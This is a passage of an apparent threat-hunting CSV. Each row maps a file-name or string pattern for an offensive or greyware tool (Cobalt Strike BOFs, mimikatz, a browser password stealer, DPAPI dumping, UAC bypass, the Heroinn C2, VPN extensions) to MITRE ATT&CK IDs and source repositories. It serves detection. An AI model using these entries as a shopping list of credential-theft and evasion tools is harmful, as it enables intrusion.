FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*headers/HandleKatz.h*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,,N/A,,, -*--headless --disable-gpu --disable-logging --dump-dom https://getip.pro*,greyware_tool_keyword,ducktail,infostealer command to retrieve public ip address,T1596 - T1590.005,TA0043 - TA0007 - TA0009,Ducktail ,N/A,Reconnaissance,https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*HeapCrypt-main*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.cpp*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.exe*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.sln*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeapEncryptDecrypt.vcxproj*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*HeartBleed*,offensive_tool_keyword,HeartBleed,Heart Bleed scanner ,T1222 - T1110 - T1046,TA0007 - TA0001 - TA0002,N/A,N/A,Web Attacks,https://github.com/TechnicalMujeeb/HeartBleed,1,0,N/A,N/A,1,26,4,2018-04-14T04:21:39Z,2018-04-14T04:06:16Z -*hekatomb-*.tar.gz*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb*-hashes *,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,0,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb-*-py3-none-any.whl*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb@thiefin.fr*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*hekatomb_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Hello from DCShadow*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Hello From sadsad Team*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*HelloReflectionWorld.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*hellsgate.asm*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*HellsGate.exe*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*HellsGate.sln*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*HellsGate.vcxproj*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*help\dll.txt*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*helpers.gpoddity_smbserver*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*Henkru/cs-token-vault*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*henry-richard7/Browser-password-stealer*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*Heroinn FTP*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,0,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_client*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_core*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_ftp*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_shell*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_util*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*HeroinnApp*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*HeroinnProtocol*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*HeroinnServerCommand*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*hfiref0x/UACME*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*hfiref0x/WDExtract*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*hhdobjgopfphlmjbmnpglhfcgppchgje*,greyware_tool_keyword,AdGuard VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Hibr2Dmp.exe*,offensive_tool_keyword,Hibr2Dmp,Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump),T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1,1,1,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*Hidden.Desktop.mp4*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop * *,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.x64.bin*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.x86.bin*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.zip*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*hide-implant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*HideProcess*,offensive_tool_keyword,HideProcess,process injection rootkit,T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/landhb/HideProcess,1,1,N/A,N/A,5,499,111,2019-03-26T03:35:57Z,2017-03-07T01:30:15Z -*higioemojdadgdbhbbbkfbebbdlfjbip*,greyware_tool_keyword,Unlimited VPN & Proxy by ibVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*HIJACK_DLL_PATH*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*hijack_hunter *,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,0,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*hijack_remote_thread*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*hijackablepath.c*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*hijackablepath.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*hijackCLSIDpersistence.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*hijackDll*WINMM.dll*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*Hijacker*,offensive_tool_keyword,Hijacker,Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.,T1135 - T1175 - T1179 - T1189 - T1202,TA0002 - TA0007 - - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/chrisk44/Hijacker,1,0,N/A,N/A,10,2213,435,2020-08-26T19:01:31Z,2016-11-25T01:39:07Z -*HijackHunter.csproj*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*HijackHunter.exe*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*hijackProgDirMissingDll*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*HInvokeHashGen.cs*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*hipncndjamdcmphkgngojegjblibadbe*,greyware_tool_keyword,RusVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 